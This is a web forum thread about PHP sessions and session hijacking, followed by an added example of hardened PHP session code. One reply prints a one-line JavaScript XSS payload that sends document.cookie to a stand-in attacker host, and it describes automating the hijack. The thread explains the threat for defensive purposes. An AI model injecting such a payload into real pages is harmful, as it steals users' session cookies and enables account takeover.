Session Variables



InNeedofHelp
07-22-2006, 04:08 PM
When you have a session going and you exit out of the window does the session automatically session_destroy()?

Twey
07-22-2006, 10:46 PM
No, but if the browser considers itself to be closed it'll delete the cookie, which expires at the end of the browser session.

InNeedofHelp
07-23-2006, 03:17 AM
So that's why when you close the window without logging out other people aren't automatically logged on with your session variables?

Twey
07-23-2006, 01:22 PM
That's right. Unless somebody steals your SID, they're not getting in. If you want to stop this effect, manually create a cookie to store the information.

InNeedofHelp
07-23-2006, 02:57 PM
But there's very little chance of somebody actually stealing an SID right? I mean, how easy can it be to figure out just one actual SID that's in use?

Twey
07-23-2006, 03:25 PM
Not at all easy. There are ways to do it, however. The most widely publicised is XSS (also known as CSS, but I use XSS to avoid confusion): Cross-Site Scripting. This occurs when a site inadvertently allows client-side scripting to be embedded in one of its pages. This could be something like this:

    window.location.href = 'http://www.evilsite.com/stealsid.php?cookie=' + escape(document.cookie);

When a user unwittingly executes the code, the cookie is transmitted to the malicious user's site, which can use PHP to extract and store the SID, and, if he uses it fast enough, hijack a session on the vulnerable site, bypassing the login procedure altogether. This is why most forums require their users to enter their password before modifying vital data, even if they're already logged in. A more advanced version of the script above is one that, using a server-side script to connect from the malicious user's server, automatically hijacks the session and changes the login details if possible, mitigating the need for the malicious user's intervention. Other tweaks can be made to the above setup too, of course, like using AJAX to do it all behind the scenes without the victim ever knowing.
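
The server-side counterpart to the thread above, added here as an example (it is not code from this thread or from any forum package): a PHP 7.3+ session bootstrap that applies the mitigations the replies mention, namely a browser-session cookie the page script cannot read, a fresh SID on login, and a re-authentication check before vital changes. Function names are assumed.

```php
<?php
// Added defensive example; not code from this thread or any forum package.
// Requires PHP 7.3+ for the array forms of the cookie functions.

// 1. Cookie flags: HttpOnly keeps the SID out of document.cookie, so the
//    script above would read an empty cookie; Secure keeps it off plain HTTP;
//    SameSite=Strict withholds it from cross-site requests; lifetime 0 means
//    the cookie dies with the browser session, as discussed above.
function start_hardened_session(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Strict',
    ]);
    ini_set('session.use_only_cookies', '1'); // never read the SID from the URL
    ini_set('session.use_strict_mode', '1');  // reject SIDs the server never issued
    session_start();
}

// 2. On login, issue a fresh SID so any value seen before authentication
//    is useless afterwards (session fixation).
function login_user(int $userId): void
{
    session_regenerate_id(true);
    $_SESSION['user_id']   = $userId;
    $_SESSION['auth_time'] = time();
}

// 3. The "enter your password again" step: treat the session as stale for
//    vital changes once $maxAge seconds have passed since the last password
//    check, which limits what a hijacked SID can do on its own.
function requires_reauth(int $maxAge = 300): bool
{
    return !isset($_SESSION['auth_time'])
        || (time() - $_SESSION['auth_time']) > $maxAge;
}

// 4. Explicit logout: clear the data, expire the cookie, destroy server state.
function logout_user(): void
{
    $_SESSION = [];
    $p = session_get_cookie_params();
    unset($p['lifetime']);                    // not a setcookie() option key
    setcookie(session_name(), '', ['expires' => time() - 3600] + $p);
    session_destroy();
}
```

In the login handler, call login_user() only after the password has been verified; before a vital change, call requires_reauth() and prompt for the password again when it returns true.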

InNeedofHelp
07-23-2006, 03:30 PM
Wow. Intense. Well, considering what you just told me I think I'm just not going to worry about SID stealers.

Thanks. :)